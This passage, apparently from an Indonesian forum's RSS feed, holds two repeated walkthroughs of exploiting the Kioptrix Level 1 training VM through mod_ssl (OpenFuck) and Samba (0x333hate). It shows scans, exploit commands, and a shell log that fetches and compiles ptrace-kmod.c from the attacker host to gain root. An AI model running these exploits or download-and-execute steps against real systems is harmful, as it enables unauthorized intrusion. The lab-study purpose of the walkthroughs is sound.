Terdapat 2 address yang bisa kita gunakan untuk exploit, kita coba satu satu dari kedua pilihan tersebut. Tapi gmn cara saya tau kalau OS yang digunakan Redhat dan apache versi 1.3.20 ? coba cek lagi hasil scanning nmap nya :D<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Target Address 0x6a = GAGAL !</span><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6a 192.168.33.128 443<br />
<br />
*******************************************************************<br />
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *<br />
*******************************************************************<br />
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *<br />
* #hackarena  irc.brasnet.org                                     *<br />
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *<br />
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *<br />
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *<br />
*******************************************************************<br />
<br />
Establishing SSL connection<br />
cipher: 0x4043808c   ciphers: 0x81130e0<br />
Ready to send shellcode<br />
Spawning shell...<br />
Good Bye!</blockquote>
<span style="font-weight: bold;" class="mycode_b">Target Address 0x6b = SUKSES !</span><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6b 192.168.33.128 443<br />
<br />
*******************************************************************<br />
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *<br />
*******************************************************************<br />
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *<br />
* #hackarena  irc.brasnet.org                                     *<br />
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *<br />
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *<br />
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *<br />
*******************************************************************<br />
<br />
Establishing SSL connection<br />
cipher: 0x4043808c   ciphers: 0x80f8050<br />
Ready to send shellcode<br />
Spawning shell...<br />
bash: no job control in this shell<br />
bash-2.05&#36;<br />
-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; tp://192.168.33.1/ptrace-kmod.c; gcc <br />
--13:45:33--  <a href="http://192.168.33.1/ptrace-kmod.c" target="_blank" class="mycode_url">http://192.168.33.1/ptrace-kmod.c</a><br />
           =&gt; `ptrace-kmod.c'<br />
Connecting to 192.168.33.1:80... connected!<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 3,921 [text/x-csrc]<br />
<br />
    0K ...                                                   100% @   3.74 MB/s<br />
<br />
13:45:33 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]<br />
<br />
[+] Attached to 1340<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0x4001189d<br />
[+] Now wait for suid shell...<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)</blockquote>
<br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Awal nya target address 0x6b <span style="color: #ff0000;" class="mycode_color">gagal</span> seperti 0x6a tapi setelah saya eksekusi terus menurus sampai dgn <span style="color: #ff0000;" class="mycode_color">8 kali</span> baru bisa mendapat remote shell seperti diatas, karena saya pikir kiotrix tersebut enggak saya perbaiki bug nya.<br />
<br />
Goal dari kiotrix server adalah mendapatkan root shell, oleh karena itu pembahasan kali ini selesai sampai disini..<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Akhir kata...</span><br />
<br />
Semoga pembahasan ini dapat berguna bagi kita semua, dan saya mohon maaf apabila ada definisi yang salah.]]></description>
			<content:encoded><![CDATA[<a href="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5Q/c0s60i04-2U/s1600/Screenshot_2016-02-26_13-29-46.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5Q/c0s60i04-2U/s400/Screenshot_2016-02-26_13-29-46.png" width="400" height="197" alt="[Image: Screenshot_2016-02-26_13-29-46.png]" class="mycode_img" /></a><br />
Kioptrix Level 1 Mod SSL Exploit - Melanjutkan posting sebelum nya yang membahas cara exploit kiotrix di service samba <a href="http://www.backboxindonesia.or.id/thread-21.html" target="_blank" class="mycode_url">Pembahasan Kioptrix Level 1 : Samba Exploit</a>. untuk posting kali ini akan membahas bagaimana cara exploit kiotrix level 1 pada SSL nya sendiri yang mempunyai bug buffer overflow.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Tool Yang Dibutuhkan</span><br />
<ol type="1" class="mycode_list">
</li>
<li>Nmap<br />
</li>
<li>Metasploit <br />
</li>
<li>Nikto<br />
</li>
<li>Kioptrix Level 1 : <a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar" target="_blank" class="mycode_url">Download disini</a><br />
</li></ol>
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Mencari Ip Target</span></span><br />
Dalam mencari ip target, saya menggunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sn</span> untuk melakukan Ping scan agar dapat mencari host yg live<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:06 HKT<br />
<span style="color: #ff0000;" class="mycode_color">Nmap scan report for 192.168.33.128</span><br />
Host is up (0.00042s latency).<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)<br />
Nmap scan report for 192.168.33.254<br />
Host is up (0.000044s latency).<br />
MAC Address: 00:50:56:E2:65:F0 (VMware)<br />
Nmap scan report for 192.168.33.1<br />
Host is up.<br />
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Service Pada Server</span></span><br />
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sV </span>untuk melakukan service version scanning<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:38 HKT<br />
Nmap scan report for 192.168.33.128<br />
Host is up (0.00022s latency).<br />
Not shown: 994 closed ports<br />
PORT     STATE SERVICE     VERSION<br />
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp  open  rpcbind     2 (RPC #100000)<br />
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
<span style="color: #ff0000;" class="mycode_color">443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (<span style="font-weight: bold;" class="mycode_b">Red-Hat</span>/Linux) </span>mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open  status      1 (RPC #100024)<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Web Server For Vulnerabilities</span></span><br />
<span style="font-style: italic;" class="mycode_i"><span style="font-weight: bold;" class="mycode_b">Nikto</span></span> adalah salah satu tool yang digunakan untuk melakukan scanning terhadap web server sehingga bisa mengetahui  'vulnerabilities' pada suatu server.<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nikto -h 192.168.33.128<br />
- Nikto v2.1.6<br />
---------------------------------------------------------------------------<br />
+ Target IP:          192.168.33.128<br />
+ Target Hostname:    192.168.33.128<br />
+ Target Port:        80<br />
+ Start Time:         2016-03-01 01:51:01 (GMT8)<br />
---------------------------------------------------------------------------<br />
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b<br />
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 11<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/12.png" alt="12" title="12" class="smilie smilie_43" />46 2001<br />
+ The anti-clickjacking X-Frame-Options header is not present.<br />
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS<br />
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type<br />
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header<br />
........<br />
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.<br />
<span style="color: #ff0000;" class="mycode_color">+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.</span><br />
<span style="color: #ff3333;" class="mycode_color">+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.<br />
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082" target="_blank" class="mycode_url">http://cve.mitre.org/cgi-bin/cvename.cgi...-2002-0082</a>, OSVDB-756.</span><br />
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.<br />
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). <a href="http://www.cert.org/advisories/CA-2000-02.html" target="_blank" class="mycode_url">http://www.cert.org/advisories/CA-2000-02.html</a>. ......</blockquote>
Yup disitu tertera kalau mod_ssl nya bisa kita remote exploit sehingga bisa mendapatkan remote shell<br />
<br />
Exploit yang saya gunakan adalah <span style="font-weight: bold;" class="mycode_b"><span style="font-style: italic;" class="mycode_i">OpenFuckV2</span></span> yang bisa di temukan di <a href="https://www.exploit-db.com/exploits/764/" target="_blank" class="mycode_url">Exploit-DB</a><br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Tapi untuk diketahui bahwa exploit OpenFuck sendiri merupakan exploit yang <span style="color: #ff0000;" class="mycode_color">lama</span>, sehingga membutuhkan sedikit <span style="color: #ff0000;" class="mycode_color">tambahan pada script</span> nya, untk mengetahui tambahan nya kunjungi link berikut : <a href="http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/" target="_blank" class="mycode_url">paulsec.github.io</a><br />
<br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Pada step 2 memperbaiki exploit openfuck menggunakan link dl.packetstormsecurity.net untuk mendownload exploit ptrace-kmod.c, karena saya tau bahwa Kiotrix Server pada Lab saya <span style="color: #ff0000;" class="mycode_color">tidak terkoneksi ke internet</span>, jadi saya <span style="color: #ff0000;" class="mycode_color">pindahkan ptrace-kmod.c ke localhost</span> ( mv ptrace-kmod.c var/www/html ) , karena di <span style="color: #ff0000;" class="mycode_color">local network tidak membutuhkan jaringan internet</span> untuk saling berkomunikasi, sehingga menjadi seperti digambar<br />
<div style="text-align: center;" class="mycode_align"><a href="https://3.bp.blogspot.com/-dX86_yZcQuA/VtR_hdguACI/AAAAAAAAA6E/BJMCHRvloRM/s1600/Selection_007.png" target="_blank" class="mycode_url"><img src="https://3.bp.blogspot.com/-dX86_yZcQuA/VtR_hdguACI/AAAAAAAAA6E/BJMCHRvloRM/s400/Selection_007.png" width="400" height="32" alt="[Image: Selection_007.png]" class="mycode_img" /></a></div>
lalu setelah itu saya <span style="font-style: italic;" class="mycode_i">compile</span> OpenFuck setelah mengikuti step di paulsec.github.io selain step no. 2<br />
<br />
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Exploiting Kioptrix SSL</span></span><br />
<br />
Setelah exploitnya udh dicompile, saat nya eksekusi<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck | grep 1.3.20<br />
    0x02 - Cobalt Sun 6.0 (apache-1.3.20)<br />
    0x27 - FreeBSD (apache-1.3.20)<br />
    0x28 - FreeBSD (apache-1.3.20)<br />
    0x29 - FreeBSD (apache-1.3.20+2.8.4)<br />
    0x2a - FreeBSD (apache-1.3.20_1)<br />
    0x3a - Mandrake Linux 7.2 (apache-1.3.20-5.1mdk)<br />
    0x3b - Mandrake Linux 7.2 (apache-1.3.20-5.2mdk)<br />
    0x3f - Mandrake Linux 8.1 (apache-1.3.20-3)<br />
<span style="color: #ff0000;" class="mycode_color">    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1</span><br />
<span style="color: #ff0000;" class="mycode_color">    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2</span><br />
    0x7e - Slackware Linux 8.0 (apache-1.3.20)<br />
    0x86 - SuSE Linux 7.3 (apache-1.3.20)</blockquote>
Terdapat 2 address yang bisa kita gunakan untuk exploit, kita coba satu satu dari kedua pilihan tersebut. Tapi gmn cara saya tau kalau OS yang digunakan Redhat dan apache versi 1.3.20 ? coba cek lagi hasil scanning nmap nya :D<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Target Address 0x6a = GAGAL !</span><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6a 192.168.33.128 443<br />
<br />
*******************************************************************<br />
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *<br />
*******************************************************************<br />
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *<br />
* #hackarena  irc.brasnet.org                                     *<br />
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *<br />
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *<br />
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *<br />
*******************************************************************<br />
<br />
Establishing SSL connection<br />
cipher: 0x4043808c   ciphers: 0x81130e0<br />
Ready to send shellcode<br />
Spawning shell...<br />
Good Bye!</blockquote>
<span style="font-weight: bold;" class="mycode_b">Target Address 0x6b = SUKSES !</span><br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden/evil# ./OpenFuck 0x6b 192.168.33.128 443<br />
<br />
*******************************************************************<br />
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *<br />
*******************************************************************<br />
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *<br />
* #hackarena  irc.brasnet.org                                     *<br />
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *<br />
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *<br />
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *<br />
*******************************************************************<br />
<br />
Establishing SSL connection<br />
cipher: 0x4043808c   ciphers: 0x80f8050<br />
Ready to send shellcode<br />
Spawning shell...<br />
bash: no job control in this shell<br />
bash-2.05&#36;<br />
-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; tp://192.168.33.1/ptrace-kmod.c; gcc <br />
--13:45:33--  <a href="http://192.168.33.1/ptrace-kmod.c" target="_blank" class="mycode_url">http://192.168.33.1/ptrace-kmod.c</a><br />
           =&gt; `ptrace-kmod.c'<br />
Connecting to 192.168.33.1:80... connected!<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 3,921 [text/x-csrc]<br />
<br />
    0K ...                                                   100% @   3.74 MB/s<br />
<br />
13:45:33 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]<br />
<br />
[+] Attached to 1340<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0x4001189d<br />
[+] Now wait for suid shell...<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)</blockquote>
<br />
<span style="color: #ff0000;" class="mycode_color"><span style="font-weight: bold;" class="mycode_b">[+]</span></span> Awal nya target address 0x6b <span style="color: #ff0000;" class="mycode_color">gagal</span> seperti 0x6a tapi setelah saya eksekusi terus menurus sampai dgn <span style="color: #ff0000;" class="mycode_color">8 kali</span> baru bisa mendapat remote shell seperti diatas, karena saya pikir kiotrix tersebut enggak saya perbaiki bug nya.<br />
<br />
Goal dari kiotrix server adalah mendapatkan root shell, oleh karena itu pembahasan kali ini selesai sampai disini..<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Akhir kata...</span><br />
<br />
Semoga pembahasan ini dapat berguna bagi kita semua, dan saya mohon maaf apabila ada definisi yang salah.]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Pembahasan Kioptrix Level 1 : Samba Exploit]]></title>
			<link>https://www.backboxindonesia.or.id/thread-21.html</link>
			<pubDate>Thu, 10 Mar 2016 11:40:57 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-21.html</guid>
			<description><![CDATA[<a href="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5M/pMTE5jhcamY/s1600/Screenshot_2016-02-26_13-29-46.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5M/pMTE5jhcamY/s400/Screenshot_2016-02-26_13-29-46.png" width="400" height="197" alt="[Image: Screenshot_2016-02-26_13-29-46.png]" class="mycode_img" /></a><br />
<span style="font-weight: bold;" class="mycode_b">Assalamualaikum...</span><br />
<span style="font-weight: bold;" class="mycode_b">Kioptrix Level 1</span> : Samba Exploit - untuk kesempatan kali ini saya akan membahas bagaimana mengexploit samba yang ada pada kiotrix server, kioptrix server adalah vulnerable os yang digunakan untuk tujuan pembelajaran dalam hal pentesting.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Tool Yang Dibutuhkan</span><br />
<ol type="1" class="mycode_list">
</li>
<li>Nmap<br />
</li>
<li>Metasploit<br />
</li>
<li>Kioptrix Level 1 : <a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar" target="_blank" class="mycode_url">Download disini</a><br />
</li></ol>
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Mencari Ip Target</span></span><br />
<br />
Dalam mencari ip target, saya menggunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sn</span> untuk melakukan Ping scan agar dapat mencari host yg live<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:06 HKT<br />
<span style="color: #ff0000;" class="mycode_color">Nmap scan report for 192.168.33.128</span><br />
Host is up (0.00042s latency).<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)<br />
Nmap scan report for 192.168.33.254<br />
Host is up (0.000044s latency).<br />
MAC Address: 00:50:56:E2:65:F0 (VMware)<br />
Nmap scan report for 192.168.33.1<br />
Host is up.<br />
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Service Pada Server</span></span><br />
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sV </span>untuk melakukan service version scanning<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:38 HKT<br />
Nmap scan report for 192.168.33.128<br />
Host is up (0.00022s latency).<br />
Not shown: 994 closed ports<br />
PORT     STATE SERVICE     VERSION<br />
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp  open  rpcbind     2 (RPC #100000)<br />
<span style="color: #ff0000;" class="mycode_color">139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)</span><br />
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open  status      1 (RPC #100024)<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Samba Version</span></span><br />
<br />
Setelah melakukan service scanning kita lanjutkan dengan mencari versi dari samba yang sudah diinstall di kiotrix menggunakan modul <span style="font-weight: bold;" class="mycode_b">auxiliary</span> pada <span style="font-weight: bold;" class="mycode_b">metasploit</span><br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>msf &gt; search smb_version<br />
<br />
Matching Modules<br />
================<br />
<br />
   Name                               Disclosure Date  Rank    Description<br />
   ----                               ---------------  ----    -----------<br />
   auxiliary/scanner/smb/smb_version                   normal  SMB Version Detection<br />
<br />
msf &gt; use auxiliary/scanner/smb/smb_version<br />
msf auxiliary(smb_version) &gt; show options<br />
<br />
Module options (auxiliary/scanner/smb/smb_version):<br />
<br />
   Name       Current Setting  Required  Description<br />
   ----       ---------------  --------  -----------<br />
   RHOSTS                      yes       The target address range or CIDR identifier<br />
   SMBDomain  .                no        The Windows domain to use for authentication<br />
   SMBPass                     no        The password for the specified username<br />
   SMBUser                     no        The username to authenticate as<br />
   THREADS    1                yes       The number of concurrent threads<br />
<br />
msf auxiliary(smb_version) &gt; set RHOSTS 192.168.33.128<br />
RHOSTS =&gt; 192.168.33.128<br />
msf auxiliary(smb_version) &gt; run<br />
<br />
[*] 192.168.33.128:139 could not be identified: <span style="color: #ff0000;" class="mycode_color">Unix (Samba 2.2.1a)</span><br />
[*]Scanned 1 of 1 hosts (100% complete)<br />
[*]Auxiliary module execution completed</blockquote>
[*]<br />
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Exploiting Samba</span></span><br />
<br />
Kita tidak perlu bingung mau menggunakan exploit apa, karena samba 2.2.x memiliki exploit yang sudah dibuat yaitu <span style="font-style: italic;" class="mycode_i">0x333hate =&gt; samba 2.2.x remote root</span> exploit, sebenar nya bisa juga dengan trans2open exploit di metasploit, tapi karena metasploit saya lagi error jadi saya make 0x333hate yang base on trans2open.<br />
<br />
~# wget <a href="http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c" target="_blank" class="mycode_url">http://downloads.securityfocus.com/vulne...x333hate.c</a><br />
~# gcc 0x333hate.c -o xpl<br />
~# ./xlp -t 192.168.33.1<br />
<br />
kita sudah mendapatkan shell akses ke system kioptrix.<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://2.bp.blogspot.com/-UckxfiKkYXQ/VtGPpSnfXlI/AAAAAAAAA5c/WsMx7VHVpe4/s1600/Screenshot_2016-02-27_19-58-32.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-UckxfiKkYXQ/VtGPpSnfXlI/AAAAAAAAA5c/WsMx7VHVpe4/s640/Screenshot_2016-02-27_19-58-32.png" width="640" height="265" alt="[Image: Screenshot_2016-02-27_19-58-32.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Ingat <span style="font-weight: bold;" class="mycode_b">"Shell is Only the Beginning"</span> , lalu apa yang harus dilakukan ? karena tidak ada clue, ane iseng mencari file <span style="font-style: italic;" class="mycode_i">.bash_history</span> untuk melihat command apa aja yang pernah di ketik<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://1.bp.blogspot.com/-szwVtHkBHtQ/VtGRJB25jgI/AAAAAAAAA5o/n7hx7E4l3rc/s1600/Selection_003.png" target="_blank" class="mycode_url"><img src="https://1.bp.blogspot.com/-szwVtHkBHtQ/VtGRJB25jgI/AAAAAAAAA5o/n7hx7E4l3rc/s640/Selection_003.png" width="640" height="265" alt="[Image: Selection_003.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Ada commad <span style="font-style: italic;" class="mycode_i">mail</span> yang digunakan untuk email proses<br />
lalu tinggal ketik aja di shell nya<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite># mail  &lt;-- untuk melihat list email<br />
# exit &lt;-- agar keluar dari perintah mail<br />
# cat /var/mail/root</blockquote>
<br />
<br />
<br />
<div style="text-align: center;" class="mycode_align"><a href="https://1.bp.blogspot.com/-GEi-CPX2ZDs/VtGSkIhPWnI/AAAAAAAAA50/tyXaOBN08o0/s1600/Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png" target="_blank" class="mycode_url"><img src="https://1.bp.blogspot.com/-GEi-CPX2ZDs/VtGSkIhPWnI/AAAAAAAAA50/tyXaOBN08o0/s640/Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png" width="640" height="531" alt="[Image: Screenshot%2Bfrom%2B2016-02-27%2B20-06-27.png]" class="mycode_img" /></a></div>
<br />
<br />
[*]<br />
<br />
Rupa nya isi email tersebut agar kita bisa lanjut ke level 2 kiotrix nya ^_^<br />
<br />
sekian tutorial sederhana dari saya. semoga dapat bermanfaat bagi kita semua dan mohon maaf apa bila ada salah pemberian definisi :D]]></description>
			<content:encoded><![CDATA[<a href="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5M/pMTE5jhcamY/s1600/Screenshot_2016-02-26_13-29-46.png" target="_blank" class="mycode_url"><img src="https://2.bp.blogspot.com/-KtOVpGSr_r0/Vs_i84FRmwI/AAAAAAAAA5M/pMTE5jhcamY/s400/Screenshot_2016-02-26_13-29-46.png" width="400" height="197" alt="[Image: Screenshot_2016-02-26_13-29-46.png]" class="mycode_img" /></a><br />
<span style="font-weight: bold;" class="mycode_b">Assalamualaikum...</span><br />
<span style="font-weight: bold;" class="mycode_b">Kioptrix Level 1</span> : Samba Exploit - untuk kesempatan kali ini saya akan membahas bagaimana mengexploit samba yang ada pada kiotrix server, kioptrix server adalah vulnerable os yang digunakan untuk tujuan pembelajaran dalam hal pentesting.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Tool Yang Dibutuhkan</span><br />
<ol type="1" class="mycode_list">
</li>
<li>Nmap<br />
</li>
<li>Metasploit<br />
</li>
<li>Kioptrix Level 1 : <a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_1.rar" target="_blank" class="mycode_url">Download disini</a><br />
</li></ol>
<span style="font-size: x-large;" class="mycode_size"><span style="font-weight: bold;" class="mycode_b">Mencari Ip Target</span></span><br />
<br />
Dalam mencari ip target, saya menggunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sn</span> untuk melakukan Ping scan agar dapat mencari host yg live<br />
<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sn 192.168.33.1/24<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:06 HKT<br />
<span style="color: #ff0000;" class="mycode_color">Nmap scan report for 192.168.33.128</span><br />
Host is up (0.00042s latency).<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)<br />
Nmap scan report for 192.168.33.254<br />
Host is up (0.000044s latency).<br />
MAC Address: 00:50:56:E2:65:F0 (VMware)<br />
Nmap scan report for 192.168.33.1<br />
Host is up.<br />
Nmap done: 256 IP addresses (3 hosts up) scanned in 30.30 seconds</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Service Pada Server</span></span><br />
Untuk pencarian service atau layanan yang sudah diinstall pada kiotrix server kita gunakan nmap dengan parameter <span style="font-weight: bold;" class="mycode_b">-sV </span>untuk melakukan service version scanning<br />
<blockquote class="mycode_quote"><cite>Quote:</cite>root@ubuntu-linux:/home/aiden# nmap -sV 192.168.33.128<br />
<br />
Starting Nmap 7.01 ( <a href="https://nmap.org" target="_blank" class="mycode_url">https://nmap.org</a> ) at 2016-02-26 13:38 HKT<br />
Nmap scan report for 192.168.33.128<br />
Host is up (0.00022s latency).<br />
Not shown: 994 closed ports<br />
PORT     STATE SERVICE     VERSION<br />
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp  open  rpcbind     2 (RPC #100000)<br />
<span style="color: #ff0000;" class="mycode_color">139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)</span><br />
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open  status      1 (RPC #100024)<br />
MAC Address: 00:0C:29:83:B2:94 (VMware)</blockquote>
<span style="font-weight: bold;" class="mycode_b"><span style="font-size: x-large;" class="mycode_size">Scanning Samba Version</span></span><br />
<br />
